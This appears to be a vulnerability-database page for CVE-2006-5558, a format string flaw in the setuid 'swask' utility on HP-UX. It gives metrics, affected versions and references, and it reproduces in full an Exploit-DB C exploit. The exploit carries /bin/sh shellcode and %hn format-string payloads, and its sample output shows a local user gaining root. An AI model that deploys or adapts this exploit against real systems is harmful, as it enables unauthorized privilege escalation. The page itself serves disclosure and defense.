CVE-2006-5558 : Detail

CVE-2006-5558

0.35%V3
Network
2006-10-27
14h00 +00:00
2017-10-18
14h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Format string vulnerability in the swask command in HP-UX B.11.11 and possibly other versions allows local users to execute arbitrary code via format string specifiers in the -s argument. NOTE: this might be a duplicate of CVE-2006-2574, but the details relating to CVE-2006-2574 are too vague to be certain.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2635

Publication date : 2006-10-23 22h00 +00:00
Author : prdelka
EDB Verified : Yes

/* HP-UX swask format string local root exploit * ============================================ * HP-UX 'swask' contains an exploitable format string * vulnerability. The 'swask' utility is installed setuid * root by default. Specifically the vulnerability is in * the handling of the "-s" optional arguement which is * passed to a format function as verbatim. * * Example. * $ uname -a * HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license * $ id * uid=102(user) gid=20(users) * $ ./prdelka-vs-HPUX-swask * [ HP-UX 11i 'swask' local root exploit * ======= 01/20/06 10:19:49 EST BEGIN swask SESSION (non-interactive) * <SNIP> * * ======= 01/20/06 10:19:50 EST END swask SESSION (non-interactive) * * $ id * uid=0(root) gid=3(sys) euid=102(user) egid=20(users) * $ * * - prdelka */ char shellcode[]= "\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22" "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08" "\xb4\x16\x70\x16""/bin/sh"; int main(){ char *d, *c, *b,*a,*envp; int i,pid; printf("[ HP-UX 11i 'swask' local root exploit\n"); switch(pid = fork()){ case -1: perror("fork"); case 0: a=(char*)malloc(2048); memset(a,0,2048); sprintf(a,"AAAAA%c%c%c%c",0x7a,0xec,0x44,0x38); for(i=0;i<103;i++) strcat(a,"%p"); envp=0; execle("/usr/sbin/swask","swask","-s",a,0,envp); break; default: sleep(1); b=(char*)malloc(2048); memset(b,0,2048); for(i=0;i<102;i++) strcat(b,"%p"); strcat(b,"%31799u%hn"); a=(char*)malloc(2048); memset(a,0,2048); d=a; for(i=0;i<39;i++)strcat(a,"A"); d+=39; for(i=0;i<strlen(shellcode);i++) *d++=shellcode[i]; envp=0; execle("/usr/sbin/swask","swask","-s",a,"-s",b,0,envp); } } // milw0rm.com [2006-10-24]

Products Mentioned

Configuraton 0

Hp>>Hp-ux >> Version 11.00

Hp>>Hp-ux >> Version 11.4

Hp>>Hp-ux >> Version 11.11

Hp>>Hp-ux >> Version 11.23

    References

    http://www.securityfocus.com/bid/20726
    Tags : vdb-entry, x_refsource_BID
    https://www.exploit-db.com/exploits/2635
    Tags : exploit, x_refsource_EXPLOIT-DB